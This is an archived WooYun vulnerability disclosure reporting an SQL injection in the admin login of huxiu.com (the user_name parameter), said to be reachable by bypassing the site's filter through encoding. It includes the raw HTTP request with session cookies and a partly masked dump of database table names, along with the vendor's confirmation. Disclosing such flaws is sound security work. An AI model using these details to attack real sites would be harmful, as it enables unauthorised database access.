当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101494

漏洞标题:绕过虎嗅网防护继续进行SQL注入

相关厂商:huxiu.com

漏洞作者: 忽然之间

提交时间:2015-03-15 14:56

修复时间:2015-04-29 14:56

公开时间:2015-04-29 14:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-15: 细节已通知厂商并且等待厂商处理中
2015-03-17: 厂商已经确认,细节仅向厂商公开
2015-03-27: 细节向核心白帽子及相关领域专家公开
2015-04-06: 细节向普通白帽子公开
2015-04-16: 细节向实习白帽子公开
2015-04-29: 细节向公众公开

简要描述:

绕过虎嗅网防护继续sql注入

详细说明:

虎嗅网子域名admin.huxiu.com,登陆user_name参数存在注入
服务端做了限制,需要绕过进行注入

漏洞证明:

POST /index.php/admin/main/login HTTP/1.1
Host: admin.huxiu.com
Proxy-Connection: keep-alive
Content-Length: 165
Accept: */*
Origin: http://admin.huxiu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://admin.huxiu.com/index.php/admin/login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_324368ef52596457d064ca5db8c6618e=1426394622; Hm_lpvt_324368ef52596457d064ca5db8c6618e=1426394727; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22dbd72051923fe0121a697a6c1f9414a2%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2210.159.61.47%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2272.89+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426395425%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D8ac73fae6469f57f51d54c1808a3ac57; SERVERID=d5442411194bb4b166c206297d72843f|1426395425|1426394627; cc=20150117763f0f7217ccd794c627a999a98f2a52
opt=ajax&user_name=admin&user_pass=admin
注入参数 user_name,(编码绕过防护)
Database: huxiuen
[161 tables]
+---------------------------------------
| pre_aid_tagid
| pre_article_att

mask 区域
*****me*****

nt
| pre_article_a

mask 区域
*****nt_2*****

101bak
| pre_article_block
| pre_article_block_item
| pre_article_books_info
| pre_article_books_info_url
| pre_article_category
| pre_article_comments
| pre_article_comments_recomment
| pre_article_comments_recomment_bak
| pre_article_content
| pre_article_content_20141101bak
| pre_article_content_20150127_bak
| pre_article_count
| pre_article_edit_log
| pre_article_edit_log_20141101bak
| pre_article_products_info
| pre_article_products_info_20141101bak
| pre_article_related
| pre_article_title
| pre_article_title_20141101bak
| pre_article_view_log
| pre_common_block
| pre_common_block_item
| pre_common_block_item_data
| pre_common_credit_log_20141101bak
| pre_common_credit_rule
| pre_common_friendlink
| pre_common_member
| pre_common_member_profile
| pre_common_member_status
| pre_common_report
| pre_common_setting
| pre_common_syscache
| pre_common_tag
| pre_common_tagitem
| pre_common_tools_share
| pre_email_list
| pre_forum_post_bak
| pre_forum_thread
| pre_group_categories
| pre_group_comments
| pre_group_forums
| pre_group_masters
| pre_group_notifications
| pre_group_section_apply
| pre_group_tags
| pre_group_tags_relation
| pre_group_zan_log
| pre_home_clickuser
| pre_home_favorite
| pre_home_notification
| pre_huxiu_activity
| pre_huxiu_ad
| pre_huxiu_aliyun_search_log
| pre_huxiu_annual_address
| pre_huxiu_anthology
| pre_huxiu_anthology_article
| pre_huxiu_anthology_comment
| pre_huxiu_anthology_count
| pre_huxiu_anthology_like_result
| pre_huxiu_anthology_subscription
| pre_huxiu_anthology_tagid
| pre_huxiu_article_draft_content
| pre_huxiu_article_draft_title
| pre_huxiu_article_ignore
| pre_huxiu_article_reason
| pre_huxiu_article_view_count
| pre_huxiu_author
| pre_huxiu_blessing
| pre_huxiu_credits_log
| pre_huxiu_data_alexa
| pre_huxiu_data_app
| pre_huxiu_data_weixin_aritlce
| pre_huxiu_data_weixin_user
| pre_huxiu_data_zhaoping
| pre_huxiu_fm_qrcode
| pre_huxiu_fm_qrcode_201409
| pre_huxiu_fm_qrcode_201502
| pre_huxiu_huodong
| pre_huxiu_huodong_baoming
| pre_huxiu_huodong_comment
| pre_huxiu_huodong_comments_recomment
| pre_huxiu_huodong_data
| pre_huxiu_huodong_view_log
| pre_huxiu_jinju
| pre_huxiu_jubao
| pre_huxiu_jubaodata
| pre_huxiu_jumpto_log
| pre_huxiu_l

mask 区域
*****g*****

_company
| pre_huxiu_l

mask 区域
*****g*****

_job
| pre_huxiu_later_read
| pre_huxiu_qr_tickets
| pre_huxiu_status_info
| pre_huxiu_tag
| pre_huxiu_tagitem
| pre_huxiu_weixin_share
| pre_huxiu_word_backlist
| pre_huxiu_word_backlist_log
| pre_huxiu_xiuping
| pre_liepin_jobs
| pre_maidian
| pre_mobile_baidu
| pre_open_ad
| pre_open_article
| pre_open_cooperator
| pre_open_group
| pre_open_purview
| pre_open_user
| pre_open_user_group
| pre_q

mask 区域
*****n*****

u_aid
| pre_shop_cart
| pre_shop_goods
| pre_shop_order
| pre_shop_order_detail
| pre_shop_ticket
| pre_sina_weibo_comment
| pre_sonos_data
| pre_tags
| pre_user_sub_tags
| pre_ww***_game
| pre_w***_game_ask
| pre_w***n_game_user
| pre_w***_huche_keywords
| pre_w***_lottery
| pre_w***_msg
| pre_w***_msg_event
| pre_w***_msg_image
| pre_w***_msg_link
| pre_w***_msg_location
| pre_w***n_msg_text
| pre_w***_msg_video
| pre_w***_msg_voice
| pre_w***_server_msg_event
| pre_w***_server_msg_history
| pre_w***_server_msg_image
| pre_ww***n_server_msg_link
| pre_w***n_server_msg_location
| pre_w***_server_msg_text
| pre_w***n_server_msg_video
| pre_w***n_server_msg_voice
| pre_w***_server_user_stat
| pre_w***_user_stat
| pre_

mask 区域
*****us*****

_poll
| pre_x***_poll_item
| pre_x**oll_option
| pre_x***_poll_profile
| pre_x***_poll_result
| pre_x***s_vote
| pre_x***ss_vote_choice
| pre_x***s_vote_field
| pre_x***s_vote_value
| pre_

mask 区域
*****w*****

_bind_info
| pre_

mask 区域
*****w*****

_bind_thread
| pre_

mask 区域
*****w*****

_session
| pre_

mask 区域
*****w*****

_temp
| pre_zhuanti
| pre_zhuanti_comment
| pre_zhuanti_extend
| pre_zhuanti_fenlei
没脱裤,请自查

修复方案:

请加强过滤策略

版权声明:转载请注明来源 忽然之间@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-17 12:14

厂商回复:

感谢白帽子提醒

最新状态:

暂无